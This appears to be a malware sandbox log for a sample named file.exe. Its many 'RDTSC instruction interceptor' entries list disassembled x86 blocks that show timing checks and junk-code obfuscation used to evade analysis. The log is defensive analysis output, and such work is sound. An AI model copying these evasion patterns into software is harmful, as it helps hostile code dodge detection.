                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F02 second address: 558F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b and esi, 229D2A6Eh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F8480C71BF8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007F8480C71C06h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F8480C71BF8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push edx 0x0000004f mov si, ax 0x00000052 pop edi 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 ja 00007F8480C71BFCh 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F89 second address: 558F8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A003 second address: 55A015 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A999 second address: 55A9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480E31394h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3DB second address: 55B3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8480C71BF6h 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007F8480C71BF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A9BC second address: 55A9CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8480E3138Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CBC2 second address: 55CBE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jc 00007F8480C71BFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C9EE second address: 55C9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CBE3 second address: 55CBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CBEB second address: 55CBEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CBEF second address: 55CC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov esi, dword ptr [ebp+122D2C9Bh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F8480C71BF8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c jne 00007F8480C71C12h 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F8480C71C00h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CC57 second address: 55CC78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8480E31399h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D709 second address: 55D738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8480C71C02h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8480C71C02h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D738 second address: 55D7AF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8480E31386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F8480E31388h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3589h], edi 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f jmp 00007F8480E31399h 0x00000034 mov ecx, 761A134Eh 0x00000039 popad 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F8480E31388h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 mov esi, edi 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D7AF second address: 55D7BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DF21 second address: 55DF25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562706 second address: 562711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8480C71BF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5627BB second address: 5627C5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8480E31386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562928 second address: 56292C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56292C second address: 562955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E3138Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480E31399h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562955 second address: 56296F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480C71BFFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563969 second address: 563A10 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8480E31386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F8480E3138Eh 0x00000010 pop ecx 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F8480E31388h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d call 00007F8480E31396h 0x00000032 mov dword ptr [ebp+122D1C6Ch], ebx 0x00000038 pop ebx 0x00000039 push dword ptr fs:[00000000h] 0x00000040 mov dword ptr [ebp+122D2EF5h], edi 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d xor dword ptr [ebp+12458E87h], ecx 0x00000053 mov eax, dword ptr [ebp+122D0C85h] 0x00000059 mov dword ptr [ebp+124673FDh], edi 0x0000005f push FFFFFFFFh 0x00000061 push 00000000h 0x00000063 push edx 0x00000064 call 00007F8480E31388h 0x00000069 pop edx 0x0000006a mov dword ptr [esp+04h], edx 0x0000006e add dword ptr [esp+04h], 0000001Ch 0x00000076 inc edx 0x00000077 push edx 0x00000078 ret 0x00000079 pop edx 0x0000007a ret 0x0000007b cld 0x0000007c push eax 0x0000007d pushad 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56296F second address: 562A06 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F8480C71BF8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D201Dh], ebx 0x0000002c mov edi, ebx 0x0000002e mov dword ptr [ebp+122D35FDh], ebx 0x00000034 push dword ptr fs:[00000000h] 0x0000003b sbb di, FACDh 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov edi, dword ptr [ebp+122D293Bh] 0x0000004d mov eax, dword ptr [ebp+122D172Dh] 0x00000053 mov dword ptr [ebp+122D1A9Eh], ecx 0x00000059 push FFFFFFFFh 0x0000005b sub bx, 0C8Dh 0x00000060 mov edi, dword ptr [ebp+122D2C27h] 0x00000066 nop 0x00000067 pushad 0x00000068 jmp 00007F8480C71C03h 0x0000006d push edi 0x0000006e jnl 00007F8480C71BF6h 0x00000074 pop edi 0x00000075 popad 0x00000076 push eax 0x00000077 js 00007F8480C71C00h 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 popad 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5657DB second address: 56580F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 or bx, 54EFh 0x0000000e push 00000000h 0x00000010 mov bx, ax 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D346Dh], esi 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007F8480E31396h 0x00000024 jmp 00007F8480E31390h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564B05 second address: 564B14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564B14 second address: 564B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564B19 second address: 564B23 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8480C71BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567BB7 second address: 567BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569863 second address: 569871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F8480C71BF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569871 second address: 5698EF instructions: 0x00000000 rdtsc 0x00000002 js 00007F8480E31386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor dword ptr [ebp+122D21AEh], edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F8480E31388h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov bh, ah 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F8480E31388h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D2F22h], ecx 0x00000054 xchg eax, esi 0x00000055 jp 00007F8480E31396h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 pop esi 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5698EF second address: 5698F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568B33 second address: 568BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F8480E31388h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 push dword ptr fs:[00000000h] 0x00000028 add dword ptr [ebp+122D217Bh], eax 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 sbb ebx, 160393BBh 0x0000003b mov eax, dword ptr [ebp+122D001Dh] 0x00000041 call 00007F8480E31399h 0x00000046 mov dword ptr [ebp+122D28B6h], eax 0x0000004c pop edi 0x0000004d push FFFFFFFFh 0x0000004f jmp 00007F8480E31393h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 je 00007F8480E31386h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568BB9 second address: 568BC3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569A74 second address: 569AF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D1A2Ah], ecx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007F8480E3138Ch 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov di, si 0x00000025 mov eax, dword ptr [ebp+122D10A1h] 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007F8480E31388h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 add bh, FFFFFFEFh 0x00000048 push FFFFFFFFh 0x0000004a push eax 0x0000004b mov dword ptr [ebp+1245280Bh], edx 0x00000051 pop edi 0x00000052 nop 0x00000053 jmp 00007F8480E31392h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c jo 00007F8480E31386h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B9F6 second address: 56BA07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F8480C71BF6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BA07 second address: 56BA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569AF2 second address: 569AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569AF7 second address: 569AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB70 second address: 56AB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BB69 second address: 56BB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBC4 second address: 56DBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBC8 second address: 56DBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E3138Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBDA second address: 56DBDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56CD8D second address: 56CE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1E28h], edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F8480E31388h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D35BBh], eax 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F8480E31388h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov eax, dword ptr [ebp+122D016Dh] 0x00000061 mov dword ptr [ebp+12485447h], ebx 0x00000067 push FFFFFFFFh 0x00000069 jc 00007F8480E31386h 0x0000006f jo 00007F8480E3138Ch 0x00000075 mov dword ptr [ebp+12451F7Dh], esi 0x0000007b push eax 0x0000007c push esi 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 pop eax 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBDF second address: 56DC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71C03h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F8480C71C08h 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F8480C71BF6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56CE21 second address: 56CE25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EBF5 second address: 56EC27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b js 00007F8480C71C15h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8480C71C03h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EC27 second address: 56EC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DE2C second address: 56DE36 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570D3C second address: 570D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570D40 second address: 570D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56FF17 second address: 56FF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E31395h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570D46 second address: 570D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570D4C second address: 570D90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+122D1A08h] 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D2A0Bh] 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2DBFh], eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jne 00007F8480E31386h 0x0000002b jmp 00007F8480E31398h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57266D second address: 572673 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579A20 second address: 579A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579514 second address: 579519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DD45 second address: 57DD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F8480E3138Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DD59 second address: 57DD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E429 second address: 57E42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E42F second address: 57E44B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jo 00007F8480C71BF6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E44B second address: 57E45F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8480E3138Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E45F second address: 57E484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007F8480C71C08h 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E484 second address: 57E48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E48B second address: 57E4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F8480C71BFCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E4A0 second address: 57E4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E4A4 second address: 57E4AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E56E second address: 57E590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8480E31393h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E644 second address: 57E64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E64A second address: 57E64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
